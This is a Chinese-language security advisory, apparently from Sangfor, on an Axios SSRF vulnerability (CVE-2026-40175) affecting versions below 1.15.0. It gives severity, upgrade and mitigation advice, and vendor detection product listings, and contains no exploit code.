  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041675" data-ratio="0.16635687732342008" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="gif" data-w="1076" src="https://wechat2rss.xlab.app/img-proxy/?k=31cbdd4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRmZvWM73XiaZBPqw0x5NMRZYf4EyVGhrTDPIdkoFdehZliamT5e8CMUaB2zSWZwhrEaqWGweZ5fyqsicQWkxeJt2bibVUMLwjMT6E%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Axios SSRF漏洞 (CVE-2026-40175)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Axios</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Axios &lt; 1.15.0</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">服务器端伪造请求（SSRF）</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：不需要用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：默认配置</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：容易，能造成敏感信息泄露。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：严重，结合 AWS IMDSv2 绕过可导致远程代码执行。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041671" src="https://wechat2rss.xlab.app/img-proxy/?k=217c2ccc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxR0rIq8jAyX98O5kq5IbsBbLnQLIeG0mRdUrhzGp4zSULBb24MkmfN3fXErrarfc2owzycKiaE3Gqiac7Ht7H2KNKiab69WTk6VvQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Axios 是一个基于 Promise 的 HTTP 客户端，可在浏览器和 Node.js 环境中运行，用于向后端 API 发送异步请求，支持请求/响应拦截、数据转换、自动 JSON 处理等特性，是目前前端开发中最流行的 HTTP 请求库。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041673" src="https://wechat2rss.xlab.app/img-proxy/?k=a273428a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSTxqgtZe6mV9iaj8yU2JBSWejUS3lrgGfgT8Y5UMJrKibpacW87KB3xflgSN1F75thxwkLdNguhXeRBS0P1eQUe3XS3wfWJNsWc%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年4月14日，深瞳漏洞实验室监测到一则Axios组件存在服务器端伪造请求（SSRF）漏洞的信息，漏洞编号：CVE-2026-40175，漏洞威胁等级：严重。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Axios 1.15.0 版本之前存在一个SSRF漏洞，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">未授权的攻击者可以构造畸形的HTTP结构发送至非预期目标，导致敏感信息泄露。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的Axios版本：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Axios &lt; 1.15.0</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041672" src="https://wechat2rss.xlab.app/img-proxy/?k=bbcda41e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQQBG3KAYCB3nVV0C1cfFFF4yBS9lnUAy59RUlDWJnlITjFbxl7ic3O5x5EjU4sqDedFn1iafjYertYCYRLx6peNxibAwzguNQPCk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布最新版本修复该漏洞，建议受影响用户将Axios更新到 1.15.0 及以上版本。</span><span leaf=""><br/></span><span leaf="">下载链接：<a href="https://github.com/axios/axios/releases/tag/v1.15.0" target="_blank">https://github.com/axios/axios/releases/tag/v1.15.0</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041674" src="https://wechat2rss.xlab.app/img-proxy/?k=895011c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTt5KrLVrUytzwxJ7XeoQQBOmOjVcMKP3kup3uiabHiavqqJrA6NmKJfXX5V0M3m5YkrDRQ4uC4pNnqLJPAV7ic4p4QkbC4JuSqEA%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041676" src="https://wechat2rss.xlab.app/img-proxy/?k=4a89cac4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTrSib4qgBTCbyqAaJ4oZ38GibYnuGyLamABDjttla9HY1oxd8UOblaqENrFzIP7IQLu0jH4YBX2USaT4OWkDsTyMnVSJXn3WZVo%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">1、风险资产发现</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Axios的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量检出业务场景中该事件的受影响资产情况，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf=""> 已发布资产检测方案，指纹ID:0032399。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0032399。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2、漏洞主动检测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Axios SSRF漏洞 (CVE-2026-40175)的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量快速检出业务场景中是否存在漏洞风险，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf="">预计2026年04月19日发布检测方案，规则ID:SF-2026-00875。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月19日发布检测方案（需要具备云镜组件能力），规则ID:SF-2026-00875。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">3、漏洞安全监测</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Axios SSRF漏洞 (CVE-2026-40175)的监测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可依据流量收集实时监控业务场景中的受影响资产情况，快速检查受影响范围，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全感知管理平台SIP】</span></span></strong><span leaf="">预计2026年04月24日发布监测方案，规则ID:11228011。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年04月24日发布监测方案（需要具备SIP组件能力），规则ID:11228011。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月24日发布监测方案，规则ID:11228011。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">4、漏洞安全防护</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Axios SSRF漏洞 (CVE-2026-40175)的防御，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可阻断攻击者针对该事件的入侵行为，</span></span></strong><span leaf="">相关产品及服务如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服下一代防火墙AF】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案，规则ID:11228011。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服Web应用防火墙WAF】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案，规则ID:11228011。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服安全托管服务MSS】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案（需要具备AF组件能力），规则ID:11228011。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服可拓展检测响应平台XDR】</span></span></strong><span leaf="">预计2026年04月24日发布防护方案（需要具备AF组件能力），规则ID:11228011。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/advisories/GHSA-fvcv-3m26-pcqx" target="_blank">https://github.com/advisories/GHSA-fvcv-3m26-pcqx</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/14</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到Axios SSRF漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/15</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 